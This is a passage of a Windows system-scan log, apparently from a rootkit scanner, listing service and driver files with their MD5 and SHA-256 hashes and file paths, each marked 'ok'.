20:47:14.0750 0x1e50  [ E7E9DBFDD3F25ED0C05B99AE9FA18BDE, 6D0204BA271FD3262DAE6E6BF9C12C0D49E3C9AF40EB1E072BD5CA5E2B8598D5 ] mountmgr        C:\windows\system32\drivers\mountmgr.sys
20:47:14.0766 0x1e50  mountmgr - ok
20:47:14.0797 0x1e50  [ 4CCBBD4944777CA100B9A6C2F149A46F, 7FC172FAF8266BFBBBBAD94FD67EA3C1872F5927DC3900A9A54DB2DFE34E7415 ] mpsdrv          C:\windows\system32\drivers\mpsdrv.sys
20:47:14.0797 0x1e50  mpsdrv - ok
20:47:14.0875 0x1e50  [ 9DE3341BD4E14BC5FADFCAD3019F2D0D, 37E0531EADABC6D4BCC496826651D4D14CF0D10156FF13C11BDE466084B44FF4 ] MpsSvc          C:\windows\system32\mpssvc.dll
20:47:14.0906 0x1e50  MpsSvc - ok
20:47:14.0953 0x1e50  [ 3D70147F55F1EC84EB9139ED7FFE48BC, 12429C2FDDDA13815F0E18F9009011AA5360955759A23A38175543F480CB92EF ] MRxDAV          C:\windows\system32\drivers\mrxdav.sys
20:47:14.0953 0x1e50  MRxDAV - ok
20:47:15.0016 0x1e50  [ 7A761AEE58658378BBA45D360F874CB0, 31972E63D93E07D92EF69571B7ED1E69B1358DCA5BEED62A9372F6411B4DFDB3 ] mrxsmb          C:\windows\system32\DRIVERS\mrxsmb.sys
20:47:15.0016 0x1e50  mrxsmb - ok
20:47:15.0062 0x1e50  [ 06D5F2FA3C61E8EA91648EA8E9F99FD3, C665B7896501D42C73955F4EAF4FA3C6B2C9286957D6023C235AFBF9BFB761C6 ] mrxsmb10        C:\windows\system32\DRIVERS\mrxsmb10.sys
20:47:15.0078 0x1e50  mrxsmb10 - ok
20:47:15.0125 0x1e50  [ 697B78CE3925E4FBFC544232A5E9E2EB, 2D03425513572F6098BAAF82C0EDB49EBAB88438971D349CA1917DA0BDB76334 ] mrxsmb20        C:\windows\system32\DRIVERS\mrxsmb20.sys
20:47:15.0140 0x1e50  mrxsmb20 - ok
20:47:15.0172 0x1e50  [ 98487487D6B3797CA927E9D7B030AE13, 05840AF0DD2E3CB596DA768DBD0728B52210EC05B55AB5921E697AD8956938DD ] MsBridge        C:\windows\system32\DRIVERS\bridge.sys
20:47:15.0187 0x1e50  MsBridge - ok
20:47:15.0218 0x1e50  [ 4A07458EB4F17573BD39F22029A991C1, 74D7A1882EA4D19B8F090C2813489E5D3F759BF4AF2D88AE852EC6510C405B5E ] MSDTC           C:\windows\System32\msdtc.exe
20:47:15.0218 0x1e50  MSDTC - ok
20:47:15.0296 0x1e50  [ 3886F1F2A4D2900ABAA7E4486BEEE6A2, ECCA22985838A914EDC866C491DEB64B9FF5110EFA9BEE541F634AC5EC3081F9 ] Msfs            C:\windows\system32\drivers\Msfs.sys
20:47:15.0296 0x1e50  Msfs - ok
20:47:15.0328 0x1e50  [ C32A7A39B960A42BA9D4FBE47213CA03, 4DA48587138972DA5E95AEDBBBE73BA8CCADC8172C6654427ABEAC8047B27E95 ] msgpiowin32     C:\windows\System32\drivers\msgpiowin32.sys
20:47:15.0328 0x1e50  msgpiowin32 - ok
20:47:15.0359 0x1e50  [ D3857A767B91A061B408CCAB02DA4F40, A4D780772086AD8717EE6DC2B6189F796939FB5E5AA08FD9D1984101998FBECF ] mshidkmdf       C:\windows\System32\drivers\mshidkmdf.sys
20:47:15.0359 0x1e50  mshidkmdf - ok
20:47:15.0390 0x1e50  [ 839B48910FB1E887635C48F3EC11A05E, F8CFD99911500CC1B6A90C8E2A1697BD5A6E5776A62A62FE5B342FE204C936B1 ] mshidumdf       C:\windows\System32\drivers\mshidumdf.sys
20:47:15.0390 0x1e50  mshidumdf - ok
20:47:15.0406 0x1e50  [ 55C0DB741E3AB7463242B185B1C2997C, D2E2A5B48A64EA0EC2A6566C08E65A38D11CEA64BCA7B57793BA0D009E4D974A ] msisadrv        C:\windows\system32\drivers\msisadrv.sys
20:47:15.0406 0x1e50  msisadrv - ok
20:47:15.0437 0x1e50  [ 216C6B035A4BA5560E1255BD8E5BB89F, A14E038604B9A5506DB145A4D9F51E2751AC825240D2744924F39C332B5DE00B ] MSiSCSI         C:\windows\system32\iscsiexe.dll
20:47:15.0452 0x1e50  MSiSCSI - ok
20:47:15.0468 0x1e50  msiserver - ok
20:47:15.0484 0x1e50  [ 509809566E49F4411055864EA8D437CD, 70F37BF9C759E8BCA1C6AC8FB9805950925E1C648ED37E8561A0F7A407DFDC28 ] MSKSSRV         C:\windows\system32\drivers\MSKSSRV.sys
20:47:15.0484 0x1e50  MSKSSRV - ok
20:47:15.0515 0x1e50  [ 63145201D6458E4958E572E7D6FC2604, EDD4A8A3BBE94B983554B1117734E66A2647B867269C5F0567C47EDE6F3FACCB ] MsLldp          C:\windows\system32\DRIVERS\mslldp.sys
20:47:15.0515 0x1e50  MsLldp - ok
20:47:15.0546 0x1e50  [ 99D526E803DB6D7FF290FD98B6204641, 4AFAA3B1186621AEAD19E12D3DBE104DD8FCD5C106F9EC3ADA4AD1BC7093E61F ] MSPCLOCK        C:\windows\system32\drivers\MSPCLOCK.sys
20:47:15.0546 0x1e50  MSPCLOCK - ok
20:47:15.0562 0x1e50  [ 06FA77C3E2A491ADCD704C5E73006269, 465A7EE5387E6C11398A554F73437278F5BF110356E7F49F315905C1F2459278 ] MSPQM           C:\windows\system32\drivers\MSPQM.sys
20:47:15.0562 0x1e50  MSPQM - ok
20:47:15.0600 0x1e50  [ E134EC4DE11CF78CB01432D180710D84, BB111F97AEEFDCA5866B157E9957599CD7A4952B5BCCA0B0BCA9EDFCD17E61FE ] MsRPC           C:\windows\system32\drivers\MsRPC.sys
20:47:15.0616 0x1e50  MsRPC - ok
20:47:15.0647 0x1e50  [ B5AECF12F09DEE97C9FCAA5BA016CE1E, F5305C4CE6C93A3A3481BD13BE0C23FE26571E11029ACFFE75FB78913681FCFC ] mssmbios        C:\windows\System32\drivers\mssmbios.sys
20:47:15.0647 0x1e50  mssmbios - ok
20:47:15.0678 0x1e50  [ 72D66A05E0F99F2528F6C6204FD22AA1, B14D433BC5795F1DC4C672302285E665DC012693E75574F60664AAD8874DE562 ] MSTEE           C:\windows\system32\drivers\MSTEE.sys
20:47:15.0678 0x1e50  MSTEE - ok
20:47:15.0710 0x1e50  [ 8AAAE399FC255FA105D4158CBA289001, 2F55C02605B4A3406B289FF9D46C76260B9138E3DE96AFAEA0E0522E5A2A746C ] MTConfig        C:\windows\System32\drivers\MTConfig.sys
20:47:15.0710 0x1e50  MTConfig - ok
20:47:15.0741 0x1e50  [ 3BCB702F3E6CC622DCAFCAA45D7CDE0A, 00D33A4AB3E7C5F65F59C63F8E2FD27EF38D5484595F785D5632E9414E29352C ] Mup             C:\windows\system32\Drivers\mup.sys
20:47:15.0756 0x1e50  Mup - ok
20:47:15.0772 0x1e50  [ 3A1E095277BBD406CEA8EA6B76950664, 47838F307A6354E77C19A7B1F3F3E22726EF60403B611F358AD6FFE81D7214E7 ] mvumis          C:\windows\system32\drivers\mvumis.sys
20:47:15.0788 0x1e50  mvumis - ok
20:47:15.0834 0x1e50  [ 4B18840511D720BA118D3017E8165875, 724458A69269A5AE57E8DAB74FF3C198A79B6F7A9602BF38A70B4A40543ED167 ] napagent        C:\windows\system32\qagentRT.dll
20:47:15.0850 0x1e50  napagent - ok
20:47:15.0897 0x1e50  [ 43D7388A90A4C6EA346A4D6FF0377479, DFDCFA448B49C8A577056070AF516F08CD2E452706A3CF9173195ABA4256F35D ] NativeWifiP     C:\windows\system32\DRIVERS\nwifi.sys
20:47:15.0912 0x1e50  NativeWifiP - ok
20:47:15.0959 0x1e50  [ 6A0C3996DA7DAE6D6939676D786EEEC4, 6E8A4C6234FD3040BC889E92016A4D5AC7BCAF5059521E50C733966163A546A0 ] NcaSvc          C:\windows\System32\ncasvc.dll
20:47:15.0959 0x1e50  NcaSvc - ok
20:47:15.0990 0x1e50  [ C982FE4CC91DECE2259F494FCEB4030F, 4C285407E6F9FBBA92180F4063AEFB736ED142D802F0151002F0CC20AB7BB4E5 ] NcdAutoSetup    C:\windows\System32\NcdAutoSetup.dll
20:47:15.0990 0x1e50  NcdAutoSetup - ok
20:47:16.0068 0x1e50  [ A10E176F3B2BF83EDE7B5C4658C93B66, 42F2FAEB4A29BBC6727D7E159D3E7E2E66D33785E5C98496EEB44D281601A23E ] NDIS            C:\windows\system32\drivers\ndis.sys
20:47:16.0100 0x1e50  NDIS - ok
20:47:16.0131 0x1e50  [ 39C8A1D9D46F5E83A016BCAB72455284, 80DBED610E0818C2C7122FBC5BC8C15BCE981538AE48DC48F464A86389AF3F68 ] NdisCap         C:\windows\system32\DRIVERS\ndiscap.sys
20:47:16.0131 0x1e50  NdisCap - ok
20:47:16.0162 0x1e50  [ 762941932B7E4C588E48A577BA9D6440, 71FA1870E398CB848D8294FEF6C60E0499CAB9A16EC3F487564C41072590E4F3 ] NdisImPlatform  C:\windows\system32\DRIVERS\NdisImPlatform.sys
20:47:16.0162 0x1e50  NdisImPlatform - ok
20:47:16.0209 0x1e50  [ 7A6F8A6D0E01432EBA294EF29CDD0FA7, D902AE15194A9F8A2198914FC76184FE7E2B589747275952A04A52853128FDB8 ] NdisTapi        C:\windows\system32\DRIVERS\ndistapi.sys
20:47:16.0209 0x1e50  NdisTapi - ok
20:47:16.0240 0x1e50  [ 79AB68BB3FFF974AD4F41FA559F4EC67, 1745EC6520B48E325C56D98A1F4DB9CE135FE3E097B3D66E6598791132CAD7BD ] Ndisuio         C:\windows\system32\DRIVERS\ndisuio.sys
20:47:16.0256 0x1e50  Ndisuio - ok
20:47:16.0271 0x1e50  [ 62C7DBF4F9301F76CF87D4B9D8F57BF8, D51FEF198F74FDF583826E259E4736F51CD49908194104677889FD135EEC2EBC ] NdisWan         C:\windows\system32\DRIVERS\ndiswan.sys
20:47:16.0287 0x1e50  NdisWan - ok
20:47:16.0302 0x1e50  [ 62C7DBF4F9301F76CF87D4B9D8F57BF8, D51FEF198F74FDF583826E259E4736F51CD49908194104677889FD135EEC2EBC ] NDISWANLEGACY   C:\windows\system32\DRIVERS\ndiswan.sys
20:47:16.0302 0x1e50  NDISWANLEGACY - ok
20:47:16.0349 0x1e50  [ 3730942D7DB2F8BB5F84542B7FF6F650, 89C9D7D7305205BDB304CE6DA7D1A57EDE86A9D77429698802A39D75EB78CAAB ] NDProxy         C:\windows\system32\drivers\NDProxy.sys
20:47:16.0349 0x1e50  NDProxy - ok
20:47:16.0396 0x1e50  [ D3F60A4345FCA9C1BE68AD7D0D6DE770, 214AF09F4B021C2F8655FBC8AC8C801E89CD9115CDE690FAEBDA69D63D660EDD ] Ndu             C:\windows\system32\drivers\Ndu.sys
20:47:16.0396 0x1e50  Ndu - ok
20:47:16.0427 0x1e50  [ 7C203A76394F9AE68F69EEE5F9612C4A, 2222654915913BDC9367A2075714906A10CF22C047A7494CD59CB71834ED1B62 ] NetBIOS         C:\windows\system32\DRIVERS\netbios.sys
20:47:16.0427 0x1e50  NetBIOS - ok
20:47:16.0458 0x1e50  [ 7CEC25C682D319D484630B3952C31A11, 025C46B367E0570E9E3F9DF1564C3E47B1524E9E9A180BBDF0E9C684838F5E42 ] NetBT           C:\windows\system32\DRIVERS\netbt.sys
20:47:16.0474 0x1e50  NetBT - ok
20:47:16.0490 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] Netlogon        C:\windows\system32\lsass.exe
20:47:16.0505 0x1e50  Netlogon - ok
20:47:16.0552 0x1e50  [ 89519D29CBEC2121CA65CC29C4D345E0, F3BA7BCAFEC8DD8B29837458D1B2B1DEE748AEAAAE0575FD3AAE65CFC72A04CD ] Netman          C:\windows\System32\netman.dll
20:47:16.0568 0x1e50  Netman - ok
20:47:16.0630 0x1e50  [ 79FA9393C67EBBF92A56923592CF7A7C, A8AB8A6346B97B68810CC632F425085BE9E63ACAED0F119A7BFD03F2DA4AA5F6 ] netprofm        C:\windows\System32\netprofmsvc.dll
20:47:16.0646 0x1e50  netprofm - ok
20:47:16.0692 0x1e50  [ 5243CFC2E7161C91C2B355240035B9E4, CFD77485A9D7BC47F3A9C53D73B2AE2D5D04B90ED38628F3124EA569F4DE969E ] NetTcpPortSharing C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
20:47:16.0708 0x1e50  NetTcpPortSharing - ok
20:47:16.0739 0x1e50  [ 12DD2800E4EEA37DC9AE256AD62423B4, 34740469EEA8740CBACD881CB232C9ABB9AB180DE5F45336BC6DBE154259F29B ] nfrd960         C:\windows\system32\drivers\nfrd960.sys
20:47:16.0739 0x1e50  nfrd960 - ok
20:47:16.0802 0x1e50  [ 80ABCD4C2DE9FD832477303AE0CA3BE5, 98F3958E650CEB1006D92980503E1B176D2CA55D2A6742C1C27CDE829D137DA9 ] NlaSvc          C:\windows\System32\nlasvc.dll
20:47:16.0802 0x1e50  NlaSvc - ok
20:47:16.0817 0x1e50  [ 17E19A742FB30C002F8B43575451DBE1, 59D226A4A5B5281C399BE96C694915E38EEAF335D31F346B0C65D8F469D7C9C3 ] Npfs            C:\windows\system32\drivers\Npfs.sys
20:47:16.0833 0x1e50  Npfs - ok
20:47:16.0864 0x1e50  [ 8ED299C30792544264E558BEA79F0947, 8A03FDA9AADB79ECBCBCDC988B7D8CF0672689C9DF673A2ECFE0D2D88A9C6A6B ] npsvctrig       C:\windows\System32\drivers\npsvctrig.sys
20:47:16.0864 0x1e50  npsvctrig - ok
20:47:16.0895 0x1e50  [ 832B5FDF0B5577713FD7F2465FCD0ACE, 4A551CDBACED47DD781EC59F8B59A13D66EFD85DCF636BCFCBACFE5972A78E93 ] nsi             C:\windows\system32\nsisvc.dll
20:47:16.0895 0x1e50  nsi - ok
20:47:16.0926 0x1e50  [ 689B3B1E95C70ABF7AFF29F9406EF1E0, 8B62D8AE53E1B3218158FADC0075682AB06D18998CF5DE82C920A9CD91C0652F ] nsiproxy        C:\windows\system32\drivers\nsiproxy.sys
20:47:16.0926 0x1e50  nsiproxy - ok
20:47:17.0051 0x1e50  [ 7BE3EDFFA3216F989A6BDCB14795DD08, 19A2D0120C46CA9BCFBC16DC3E65687ACDDCBA33B79128188652BA2AFAA2EE2F ] Ntfs            C:\windows\system32\drivers\Ntfs.sys
20:47:17.0098 0x1e50  Ntfs - ok
20:47:17.0129 0x1e50  [ 4163ADE07DB51843AE31F65B94F5398D, 4349E7EF1EE1E71E1F436BA42F5B58871D82B987D513BA2D6E1CEB8A21BD1B20 ] Null            C:\windows\system32\drivers\Null.sys
20:47:17.0145 0x1e50  Null - ok
20:47:17.0176 0x1e50  [ D6D34118263412D3AAA8348A9572B7F2, 66106A25BC5A4CA7697A23ED67CEDB5C0BF678EA70FD967A405D2DF76F4CA3A4 ] nvraid          C:\windows\system32\drivers\nvraid.sys
20:47:17.0176 0x1e50  nvraid - ok
20:47:17.0207 0x1e50  [ 27AFC428D1D32ABD04A86763A4EDDEA9, 0920866013A8C8CFEE00E6AECDD41736F5501C49837E2D785998734F087F6B98 ] nvstor          C:\windows\system32\drivers\nvstor.sys
20:47:17.0223 0x1e50  nvstor - ok
20:47:17.0238 0x1e50  [ 051CFB5107BAAE510419BDC41F8C4036, 9990906F17A3886EF301D2AA6556263B52A1C0554C6BD18331AF44ECECAEE4B5 ] nv_agp          C:\windows\system32\drivers\nv_agp.sys
20:47:17.0254 0x1e50  nv_agp - ok
20:47:17.0348 0x1e50  [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:47:17.0348 0x1e50  ose - ok
20:47:17.0582 0x1e50  [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
20:47:17.0696 0x1e50  osppsvc - ok
20:47:17.0758 0x1e50  [ AB76700D764A342D7475FB8F47CAB18C, ECDF705D3E69EF6E7044C98A462A7281D0E7D0D85769C0815555D934B0B69C8D ] p2pimsvc        C:\windows\system32\pnrpsvc.dll
20:47:17.0758 0x1e50  p2pimsvc - ok
20:47:17.0805 0x1e50  [ 4319FD931DCD796435ECB5DB4A04FBA5, 20185B2F359EEC202B37019A4E4F5B914ADCF78B97AF0CBD91EECED2259FC6DE ] p2psvc          C:\windows\system32\p2psvc.dll
20:47:17.0821 0x1e50  p2psvc - ok
20:47:17.0852 0x1e50  [ 4563DAF8C6A740AD7F501E219BD10766, 7A1212DDAE2D66A9C2041262796904E36036CDC4C5B75C2F66B8DF9D89F7C25D ] Parport         C:\windows\System32\drivers\parport.sys
20:47:17.0852 0x1e50  Parport - ok
20:47:17.0899 0x1e50  [ D6ACCF9F2EEEEA711C14EFD976E573F3, 60D2A81832A8D24F91C3EF134440D5026354917F59462BACBCE7A01D84767D91 ] partmgr         C:\windows\system32\drivers\partmgr.sys
20:47:17.0914 0x1e50  partmgr - ok
20:47:17.0977 0x1e50  [ 4811D9EC53649105A5A8BEA661B0F936, C77907E03D0561500FCFEAFAC323E9679E66297329901A0CA2BD7E919419A8E8 ] PcaSvc          C:\windows\System32\pcasvc.dll
20:47:17.0977 0x1e50  PcaSvc - ok
20:47:18.0008 0x1e50  [ 4A003E8F718C1E6A2050CA98CD53E3E2, BCC3BE1EC3FA4967353371D85094D096940A7B5944A6FFCA31E8FBE83D92CC6C ] pci             C:\windows\system32\drivers\pci.sys
20:47:18.0023 0x1e50  pci - ok
20:47:18.0039 0x1e50  [ F9908D274D458220F91E89B54D78D837, 1E89ABFA6B375383E0297CEE5AF66E37F90E16DD21ABA5C91777A86CDF013B4D ] pciide          C:\windows\system32\drivers\pciide.sys
20:47:18.0039 0x1e50  pciide - ok
20:47:18.0086 0x1e50  [ 84D19CB6102627932DCB5DFDF89FE269, 2F9C47E076645B35877D9ACA77968EFFCDA8794D76265CD9A4AAA239C4B33C5F ] pcmcia          C:\windows\system32\drivers\pcmcia.sys
20:47:18.0086 0x1e50  pcmcia - ok
20:47:18.0117 0x1e50  [ CEBBAD5391C2644560C55628A40BFD27, 8AAA6EBD8D89FC91AECCCF1452F53C5650A1A17027FF4E64D224371404CE4C8B ] pcw             C:\windows\system32\drivers\pcw.sys
20:47:18.0117 0x1e50  pcw - ok
20:47:18.0164 0x1e50  [ 0698DEDEAD6A00AD0D468C687D830FBF, B9DCA1A61F2EF80DB26380F390F2E9A17114D33129D61CF465B949B6A7916CAA ] pdc             C:\windows\system32\drivers\pdc.sys
20:47:18.0164 0x1e50  pdc - ok
20:47:18.0257 0x1e50  [ 61FE70659CD43E07F94DA4DC31DEC493, 3739B6670B440173FD81DE3D47B0B90FAF296802AD4F57C05BF5CF191BF16022 ] PEAUTH          C:\windows\system32\drivers\peauth.sys
20:47:18.0273 0x1e50  PEAUTH - ok
20:47:18.0289 0x1e50  [ EE926C59CBD4DC4DC9FBB85014A2F1A5, 777459BD30A480E03EA5D0BBA431C2CD573403687FAA0B29F172086A0304E230 ] PEGAGFN         C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys
20:47:18.0289 0x1e50  PEGAGFN - ok
20:47:18.0382 0x1e50  [ EB88FA19F0EA05DD04BE9C5FFEEFFE1A, 459CF99D5243C4ACAA38C7B426ADC52F1044C759D06A925D475DF6213AEB85CD ] PerfHost        C:\windows\SysWow64\perfhost.exe
20:47:18.0398 0x1e50  PerfHost - ok
20:47:18.0507 0x1e50  [ 6E84BFF58F7643499277F29DFA2F8C8D, 401CCF137F35D9690C7B56B2BFEDB2DB72709EBE38626D787904B67640EF6F14 ] pla             C:\windows\system32\pla.dll
20:47:18.0554 0x1e50  pla - ok
20:47:18.0601 0x1e50  [ 799BE46D45D486704CE0F37CA5385262, BB78DEE83B9DB613B1C083D55FAA458BE3E394AED80EB91B599185A7272F33B3 ] PlugPlay        C:\windows\system32\umpnpmgr.dll
20:47:18.0616 0x1e50  PlugPlay - ok
20:47:18.0647 0x1e50  [ 8E2414E818C26C4A9C70CB2B8567F04F, A16B22AE143BA070C562FBE5DEF32F7E228F50B302B66E46B46C44C0F50A4461 ] PNRPAutoReg     C:\windows\system32\pnrpauto.dll
20:47:18.0647 0x1e50  PNRPAutoReg - ok
20:47:18.0694 0x1e50  [ AB76700D764A342D7475FB8F47CAB18C, ECDF705D3E69EF6E7044C98A462A7281D0E7D0D85769C0815555D934B0B69C8D ] PNRPsvc         C:\windows\system32\pnrpsvc.dll
20:47:18.0694 0x1e50  PNRPsvc - ok
20:47:18.0772 0x1e50  [ 0108C8E5176D590F242701EF5A62CC26, 3A72F5D4402663B7445F6B3C55F01E83A619B6192F7D3CC2DE3C57F9F50D5A2D ] PolicyAgent     C:\windows\System32\ipsecsvc.dll
20:47:18.0772 0x1e50  PolicyAgent - ok
20:47:18.0835 0x1e50  [ F1E067F56373F11EA4B785CAE823740A, 69BD30E64DA17595FF29C9C9FF9AD4F2F4BE29B688FBAC9DABB2FA9D13A47FF0 ] Power           C:\windows\system32\umpo.dll
20:47:18.0850 0x1e50  Power - ok
20:47:18.0944 0x1e50  [ 362D47E5B4D67270DE4B8606036F4ADD, 716E229C68D91AEA5B5629F60133D5CBDC0C95ABA54D9DC6264E923CAF4DC6C0 ] PptpMiniport    C:\windows\system32\DRIVERS\raspptp.sys
20:47:18.0944 0x1e50  PptpMiniport - ok
20:47:19.0100 0x1e50  [ C2D3B3D0060619D5E03E696BD56FF59F, 155954F16B6F9B51BA16F43F1AE6F977B1EC4DE77862C6F6C722293189BE0DD2 ] PrintNotify     C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
20:47:19.0162 0x1e50  PrintNotify - ok
20:47:19.0225 0x1e50  [ DD979EB6A7212F60E4AFBE96EDC7AE6D, BC681D64C5B8F08FD4613D71111853FCD5B05E4BD127D2C6258BAED7627105BE ] Processor       C:\windows\System32\drivers\processr.sys
20:47:19.0225 0x1e50  Processor - ok
20:47:19.0271 0x1e50  [ 429E8502AD2227CF88F8840FC5BD590D, A186DA46C083580ACEDE9C7E3156865034302CD803140EEEC8E1DE16DA4BC99B ] ProfSvc         C:\windows\system32\profsvc.dll
20:47:19.0271 0x1e50  ProfSvc - ok
20:47:19.0303 0x1e50  [ EB8034147D4820CD31BFCB11A2A652DF, B10B5E16B7A05D2DB2D5D1945B6146DE15EEDE2C778772A59F104706B5145E46 ] Psched          C:\windows\system32\DRIVERS\pacer.sys
20:47:19.0318 0x1e50  Psched - ok
20:47:19.0349 0x1e50  [ 0AFBF333B6F87A2F598EAB379AF100B8, D11F3A4D7E4463B62E2DBDE5FC61425B1FDFB07DD1A19BC001D479CA1F554510 ] QWAVE           C:\windows\system32\qwave.dll
20:47:19.0365 0x1e50  QWAVE - ok
20:47:19.0396 0x1e50  [ 13D47BB0CCA2FC51BD15F8E85C6A078E, EA832A9511007C9E8599C3066E1FA66BE869E8A27886D9A9AC590BD4DFBD1A15 ] QWAVEdrv        C:\windows\system32\drivers\qwavedrv.sys
20:47:19.0396 0x1e50  QWAVEdrv - ok
20:47:19.0427 0x1e50  [ 873C60F8178100557740A832FCE10B5F, 400EF60CB2C98E2AFE122AF3D01CCE56A1548AF865345EE2194AB74DBCBF4C48 ] RasAcd          C:\windows\system32\DRIVERS\rasacd.sys
20:47:19.0427 0x1e50  RasAcd - ok
20:47:19.0459 0x1e50  [ 69B93F623B130976243ECA3D84CC99CA, F27617E651EADFAEE479619AAB01CDAA98111BA63E204D5C44A1256732CB0100 ] RasAgileVpn     C:\windows\system32\DRIVERS\AgileVpn.sys
20:47:19.0474 0x1e50  RasAgileVpn - ok
20:47:19.0505 0x1e50  [ 005F6E54C4A2DA4EBF68FB0392CE8BB0, 2F3C90A04964D4D906238BD557D90F7AC05DF86FE9729C4378B39431F54DDAE3 ] RasAuto         C:\windows\System32\rasauto.dll
20:47:19.0505 0x1e50  RasAuto - ok
20:47:19.0537 0x1e50  [ A14D625C5AEE5FFE0F47D1A1D419FAAE, 1229B81C23340AD5B436B1FD227876EB41715CE6BD270BA367F18879D26B8F04 ] Rasl2tp         C:\windows\system32\DRIVERS\rasl2tp.sys
20:47:19.0537 0x1e50  Rasl2tp - ok
20:47:19.0588 0x1e50  [ C923C785A2DE0B396AD6D13ACAFF2DE9, 4F950DA776FBABEC7D546983D6F3018733F61268A4BF95C01D4836AD000BD073 ] RasMan          C:\windows\System32\rasmans.dll
20:47:19.0593 0x1e50  RasMan - ok
20:47:19.0625 0x1e50  [ 00695B9C2DB6111064499C529E90C042, 3CD4DF4D8001C2BBF52EEEB1F0D587209878BEAC339D268892477AD840D490F1 ] RasPppoe        C:\windows\system32\DRIVERS\raspppoe.sys
20:47:19.0625 0x1e50  RasPppoe - ok
20:47:19.0656 0x1e50  [ A7F24D8CD1956B0A1FDCB86CC5114DE4, 30489D235362DF62B105378597168B13F4BAC74A8EDDBDA25237E3C017B69FEE ] RasSstp         C:\windows\system32\DRIVERS\rassstp.sys
20:47:19.0656 0x1e50  RasSstp - ok
20:47:19.0718 0x1e50  [ CA03D642ACE58E1BA54E4B383F91CD69, 39BB942603801CF11FBEA28E24F8C8D1EF2AF615D1FABF951683A015D6A6EF37 ] rdbss           C:\windows\system32\DRIVERS\rdbss.sys
20:47:19.0734 0x1e50  rdbss - ok
20:47:19.0765 0x1e50  [ CA7DF5EC95D8DE0DD24BE7FF97369F68, 153E6F716CA935DBCACB8FF1BB8DE5F5551CE3D18878225470E45893CA69BDB8 ] rdpbus          C:\windows\System32\drivers\rdpbus.sys
20:47:19.0765 0x1e50  rdpbus - ok
20:47:19.0796 0x1e50  [ B2A3AD74FF2E2FFA73AF2567108231B3, DF8CEA6215F75C634D56F6B8AE11ECCEEB5F8CBC091AC3D6D9F7DE214B00A439 ] RDPDR           C:\windows\system32\drivers\rdpdr.sys
20:47:19.0796 0x1e50  RDPDR - ok
20:47:19.0859 0x1e50  [ 57F4787E4602A3FCA719C0A33137C6DA, D03AE59A184EB5D126F8EAB9D36EE406ABB8B9ED834F2D2496DDB1349FF56F89 ] RdpVideoMiniport C:\windows\system32\drivers\rdpvideominiport.sys
20:47:19.0874 0x1e50  RdpVideoMiniport - ok
20:47:19.0905 0x1e50  [ B3CB0721E81E30419CE7D837EF4EA151, EC9410818661BF77E4A19694E3A3030E1D983B36F49C72E27F92A1424E0729C2 ] RDPWD           C:\windows\system32\drivers\RDPWD.sys
20:47:19.0905 0x1e50  RDPWD - ok
20:47:19.0952 0x1e50  [ 62C1F8A0685FE07E998AA296C4F697C4, C636AB2D0F139003A6AD7A12E9DC13EE4485A62F30DA59AF842FF02FE07442EE ] rdyboost        C:\windows\system32\drivers\rdyboost.sys
20:47:19.0952 0x1e50  rdyboost - ok
20:47:19.0999 0x1e50  [ 3663CCF243EE0C04E9F6F91ED1737273, 31D06445996F99A7F6B32004D1BA63A21C61DE125373F860BA9A9DE5278E8293 ] RemoteAccess    C:\windows\System32\mprdim.dll
20:47:19.0999 0x1e50  RemoteAccess - ok
20:47:20.0046 0x1e50  [ E80DD61E52EDFFF9DA1ED7260A68855B, 97909F42AE35E28B8F98C01A1D8BAD80A949CDCA0C88FB4ACF0A655DC7C10E45 ] RemoteRegistry  C:\windows\system32\regsvc.dll
20:47:20.0046 0x1e50  RemoteRegistry - ok
20:47:20.0108 0x1e50  [ CCBFCABDFE2BC22F0645CEAADDB36004, 279EA9075079F91165027CEFD4FBC61A213CA602EE7DE106F7D2D243468706AA ] RFCOMM          C:\windows\System32\drivers\rfcomm.sys
20:47:20.0108 0x1e50  RFCOMM - ok
20:47:20.0155 0x1e50  [ 73F2E030B5C24E4E41401B5F0D59E6FD, FAA8B5E3159684E0836900C6EAF63857B445F7F180169B56D5790F097EDAA38B ] RpcEptMapper    C:\windows\System32\RpcEpMap.dll
20:47:20.0155 0x1e50  RpcEptMapper - ok
20:47:20.0186 0x1e50  [ 10B21284B3D964AB3DC45490E57D422E, 12D5E3A7785F21C99C5EAD14A88EB7A86A058E26C091991339356D99D196CC13 ] RpcLocator      C:\windows\system32\locator.exe
20:47:20.0186 0x1e50  RpcLocator - ok
20:47:20.0249 0x1e50  [ 1EC6E533C954BDDF2A37E7851A7E58FD, C25936A7465B6A2B3D05D2FCB09D91ACC07CFE038A5E968C99CFA9D9F2967DD4 ] RpcSs           C:\windows\system32\rpcss.dll
20:47:20.0280 0x1e50  RpcSs - ok
20:47:20.0311 0x1e50  [ E04E770DD198B9399640717145E79EBF, 2F9BECB7E4B0A522C6370FD39CFD7DFD3FB5D0A779AECCED2EE855629FA3C952 ] rspndr          C:\windows\system32\DRIVERS\rspndr.sys
20:47:20.0327 0x1e50  rspndr - ok
20:47:20.0358 0x1e50  [ 0E32A8922DCFD28EA00AAEC07CB3F331, 27F329C6A66DB01C291E1EDCEB7781A05658520B12FF8ECD1FBD3B86EF78DF30 ] RSUSBSTOR       C:\windows\System32\Drivers\RtsUStor.sys
20:47:20.0373 0x1e50  RSUSBSTOR - ok
20:47:20.0420 0x1e50  [ 34DA0D14F5C3F1883A331AFB975AB434, BB5D580C1DCAE59CC1DB75C411A5A4DDF435931469E7EBFF5DFDADBFE07ADEBF ] RTL8168         C:\windows\system32\DRIVERS\Rt630x64.sys
20:47:20.0436 0x1e50  RTL8168 - ok
